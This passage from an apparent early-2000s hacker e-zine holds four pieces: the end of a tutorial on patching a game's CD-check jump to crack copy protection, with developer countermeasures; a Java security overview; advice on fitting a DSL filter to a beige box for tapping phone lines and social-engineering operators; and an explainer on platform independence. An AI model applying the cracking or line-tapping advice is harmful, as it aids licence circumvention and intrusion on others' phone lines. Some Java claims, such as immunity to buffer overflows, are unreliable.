further(); else { display error message(); abort the game(); } as you can see above , it is that simple "if" condition that is the point of concern . Now , the gibberish you see when you open the game in binary mode from the vc++ ide are the actual binary instructions as seen in assembly language instruction format . You can see how the source code looks like , but you'll have to guess where this particular piece of code is located among the binary instructions in the game's executable . This is the place where you need to spend some time and have a lot of patience . Use breakpoints and single step through the program repeatedly , until you are quite sure that you have found the right place (where this if condition is hiding !!). step 4 : dust out your pentium manual ;) , if you do have a printed version . or get one from - http://www.intel.com . step 5 : the "if" condition is usually implemented using the JMP instruction or it's many variants . look carefully in the manual for the JMP and it's variants , keeping an eye on what you suspect as the binary code of that "if" condition in the game's executable code . NOTE : THIS NEEDS A LOT OF EXPERIENCE AND PATIENCE . DO NOT TRY THIS IF YOU LACK EXPERIENCE OR PATIENCE ! a typical implementation might look like this : //if condition CMP ah,5 JNZ 02ef4 <-- this is the one you have to look out for !! ... ... //else condition (starting at offset 02ef4) ... ... step 6 : this is the tricky one . you have to "modify" the instruction to render ineffective , the "if" condition in the binary code . you could replace any conditional JMP instructions (or variants) that are the bytes of that "if" condition , with unconditional JMP instructions . So to speak , now even if the code finds out that the current drive is not the cd drive type , it would still continue executing .. since the code has now been "modified" ;) . step 7 : save the program back to the hard drive . step out of the ide and activate the program . If it works , hooray !! . If it doesn't .. well , you have to consider giving it one another shot . After all , attacking a security mechanism requires a lot of effort ;) ! For people who feel that this is a "how to crack copy protection mechanisms" article , please feel free to continue reading through the next section . Fighting Back So , given the fact that we now understand how to attack this kind of code , how can you as a game programmer provide strong security for your code in such a way that someone who tries to attack your copy protection mechanism finds the going difficult ? I suggest some techniques below : 1 . vc++ source code is vulnerable to such an attack , since it is quite straightforward . So , if you are indeed writing your game in vc++ try to introduce unnecessary complications into your source code (on purpose :p , i know you might argue - "i write my code in a very efficient manner all the time" - just for this once .. take it easy :p :p) . Do not have a simple if-else structure , put in a switch or extra function calls to throw the attacker off guard . 2. write your game's main module code in VB . Since VB versions 5.0 on execute on top of the "VB virtual machine" , the if-else condition you write is converted into psuedo code of some sort that is only understood by the VBVM . And due to this double level complexity , it will make life very diffcult for an attacker . 3. write the cd drive checking code in a seperate (little) program , then embed that program using the OLE container into your main game program . This is also another strong solution . With this last section , i conclude this article . As you can see , i have taken an unbiased standpoint on the issue of security . As (wannabe) hackers , we think of ways and means to bend the rules , but on the other hand , we also have the responsibility to find out weaknesses in systems , so that they can be made stronger . The issue of security is a never ending war . Let the fireworks begin !! Author : AgNi E-zine Contributor www.hackingzone.org +11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111+ Java Security by 0versight There is not one single programming language that is 100% secure, but if I were ever to bet any money, It would be on Java. It is considered by many programmers to be the most secure language, it is not as powerful as C++ if you want to compare it to that language but from the ground up it is more secure than the counterpart that im using. The first line of defense is the structure of the Java Virtual Machine (JVM) itself. It is prohibited from having any direct access to hardware and any of the Operating System architecture. Whenever the JVM starts loading untrusted code it goes through a process called byte-code verification. This makes sure that underflows or overflows of the JVM stack does not occur, hence Java is immune to buffer overflows. This is all information based on the latest Java Virtual Machine, in the past it was possible to execute a buffer overflow attack with the Netscape Navigator 4 browser. The process of byte-code verification was built obviously so that it wont crash and/or make your system vulnerable. It is currently very hard to make any kind of code that could potentially cause a buffer overflow attack because the compiler that Sun provides, denies this.There is also Borland's Jbuilder and J++ which is made by Microsoft. If you can remember, there was a exploit for Microsoft's JVM at the end of last year, Microsoft's Programmers failed to secure the compiler and the VM as well which allowed attackers to make code that bypassed the byte-code verification. The exploit was known to bypass the check and reformat C. For you or anyone to make any exploit or attack on the Java structure itself you would need pretty much have to do what Microsoft did, made their own compiler and have it allow or "ignore" any malicious code and execute it. Alot of people do not like working with Microsoft J++, the standard j2sdk that Sun provides is more than good enough, If you are diehard or are wanting to see and make more powerful things with Java, You should look into JBuilder by Borland. All code installed on the hard drive is granted fullaccess by Java standards, Untrusted code is when youdownload an applet over the net. Untrusted does not mean it is malicious, its just "new" to the computer and should treated with caution. What java does to treat untrusted code with "caution" is run it through the sandbox. The Sandbox in short is a very restricted environment for Java code to run inside. The Security manager is the basic default settings for how to manage and run Java coding. When code installed on the hd is being runned that for example checks for a certain file, it will check with the Security manager if it allowed to do this, in this case checking for a certain file. Untrusted code on the other hand will be denied to check for any file on the hard drive by the Security manager. The file that controls all this is simply called the policy class it is "java.policy". If you have some basic knowledge of how Java works, You can open it with a text editor like kedit from the KDE suite or gedit from the Gnome, and so on. You can edit what kind of actions you want Java to do when running a program from denying certain actions or even permitting them. Editing the policy is also possible through the Policy Tool that is included with the java developer package. It is much easier to do it with the latter, but if you're feeling crazy, by all means play around with the text editor. Digital signatures also work with Java Security to give you a more trusted relationship with unkown code. If a browser or a Java powered p2p client for example wants to have full/unrestricted access to your hard drive, then it would digitally sign the code to have such access. These are the main implementations of security for Java, this language was built with as much security as can be packed into it, Sun and other contributors try to cover aspect possible and it indeed works well. +1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111+ _____________________________________ / / / A new addition to your Beige Box / / / \ by colt45 \ \ and wizbone \ \_____________________________________\ [[[[[[[[[| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |]]]]]]]]] [[[[[[[[[ ]]]]]]]]] [[[[[[[[[ This file was not brought to you by Telus. ]]]]]]]]] [[[[[[[[[ Bringing the technology of tomorrow to yesterday ]]]]]]]]] [[[[[[[[[ and selling it to today for twice as much. ]]]]]]]]] [[[[[[[[[ ]]]]]]]]] [[[[[[[[[| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | ]]]]]]]]] With the outbreak of DSL, more and more people are giving up their dial-up connections for it. So with this in mind you need to update your beige box. When you subscribe to DSL, a high frequency data signal is sent through your line on the same pair as your current voice service resides. DSL service requires special filters on the customer premise for a voice line and DSL service to coexist happily on the same pair. If you dont plan on climbing into someone's home to connect your beige box to their filter, you will hear a constant "beep........beep...boop" in the line. This makes conversations difficult. A few notes on DSL -Most DSL lines are run off of fax lines. -There are two types of filters available for DSL: POTS splitters, and an inline-filters. The inline filters are a simple box with an rj11 port on one end, and a short (2-3") cord with an rj11 crystal on the other. This type of filter is only for voice. For example, you get DSL on your fax line so you plug your DSL mowdun (stands for mow-dalawn dun-dalawn) into the phone line, and your fax (aka "PH4CKS") into the inline filter, and then into the line. The only possible downfall of these types of filters is that the voice can potentially cause a small amount of interference with the DSL connection, but unless you have a terrible line, or a long run from your CO, you won't notice. / / | (1337 ASCii) | your mom's | [Telco]----telephone line---|-[demarc]-----[inline filter]--[ph4cks masheen] | \ \----[DSL mowdun] The POTS splitter usually has three ports: 1. LINE, LINE-IN, or POTS -- This is where the phone line comes IN to the pots splitter. (POTS stands for Plain Old Telephone System... I didn't name this shit, don't blame me). 2. PHONE -- This is where the voice channel is split out to. duh. Everything but . 3. MODEM, DSL -- The mowdun is plugged in through this port. Everything but DSL signals is filtered through this port. / / | (1337 ASCii) | your mom's ____________ | [POTS FILTER] [Telco]----telephone line---|-[demarc]---- [ LINE ] | [ PHONE ]--[ph4cks masheen] [ MOWDUN ]----[DSL mowdun] [____________] The POTS splitter has it's advantages because it can be installed at the Demarc and doesn't require any extra ugly filters to hang out of your wall jacks. There's also the aforementioned potential for interference with the inline filters. Probably for the beige box, the inline filter would be ideal and very simple to modify for beiging use while a POTS filter would be alot more trouble to splice in properly. Plug your BB into the filter and then splice the filter onto the pair upon which the DSL service resides. Your beige box will still work with out the in-line filter, but it will be harder to successfull social engineer your targets, especially operators with all that line noise. But remember kids, beiging on private phone lines without prior permission is against the law, and soon reading this article will also be against the law. So be careful, and remember, only YOU can prevent forest fires. `~12/23/02~` +1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111+ Platform Independance: An Introduction by Agni This article describes in brief the concept of platform independence . Firstly , we have to try and understand one major problem faced by programmers worldwide until recently . Programs are written in syntax particular to a programming language . This is called the source code . This code is then translated into binary using a translator program - a compiler or an interpreter . One thing must be clear at this stage - The translator "merely" translates the source code into bytes that are understood and executed by the processor on that machine . Also the bytes must be arranged into a program format that is understood by the operating system running on that machine . The combination of the processor and operating system is called a "platform" . What you must realise is that the translator itself satisfies the above said conditions . Since this translator itself runs on the same computer . Hence the translated output produced after compilation or interpretation (whatever the case) , is a set of bytes that are very particularly restricted to the underlying platform . Now , with that little explanation done ,let us focus on the actual problem . How do you give the binary (executable) version of a program to someone and guarantee that it will execute as it is on that person's computer ? What is the exact problem with this situation , you might wonder ? Well , there are not one but two problems that your program has to face ! * ) Is this other computer having the same processor (or a compatible one) as on the first computer (that the program was translated on) ? * ) Is this other computer running the same operating system (or a compatible one) as on the first computer (that the program was translated on) ? If the answer to anyone of these questions is NO , the program will not run on the other computer . Mainly because , (usually) two processors from different companies do not produce the same reaction given a set of bytes - since they have different instruction sets . Also , the program formats differ from one operating system to another . Hence , here comes the next point to be understood . Portability : is a critical term that has to be first understood before we move on to its "big brother" - latform independence . "Portable" refers to something that you can "carry around" without too much bother . Now , what we are talking about here is carrying around programs. If you still haven't understood what we are talking about - remember people talking of "porting a program to a platform" - what is that supposed to mean ? Read on .. Porting (a.k.a portability) is "talked" about at not one but two different levels * ) Source Level : This is the easiest one . We define a language to be source level portable if its source code can be recompiled (with maybe just a few little changes) on any given platform for which the corresponding translator is available . Remember , the translator itself has to be satisfying some conditions (as mentioned above) . Programming languages like C , C++ and JAVA satisfy this condition . * ) Binary Level : This is the tough one . For a long time , people thought this level of portability could never be achieved , until now . Once JAVA arrived on the scene , the rules of the game changed . JAVA had achieved the impossible , but then JAVA is not an ordinary player ! With all that said and done , let's try to get to the actual point of discussion . We define a language to be binary level portable if its binary code (!) can be as it is (no changes permitted !) taken on to a platform and executed directly . This is possible only if there exists a certain "something" on the platform on which this program has to be executed . The compiler is not compulsory , but what is absolutely necessary is a virtual machine that makes it possible for the binary program to run directly . Programming languages like JAVA and Python , fall into this category . So in summary , platform independence is said to be achieved , when the binary executable of a program can be executed without the necessity of recompiling the source code of the program on every one of the target platforms - this is also what is called "binary portability" as has been discussed above . I hope this little article helps you to understand the concepts of portability and platform independence . Author : AgNi Contributing Member : HackingZone (e-zine) +10101010101010011111111110101010101010101010101001010101111010101000101001010000000001010111111110101001011010101001010101001010101010+ +1010101010101001111111111010101010101// END OF THE FIRST ISSUE //1111110101001011010101001010101001010101010+ +10101010101010011111111110101010101010101010101001010101111010101000101001010000000001010111111110101001011010101001010101001010101010+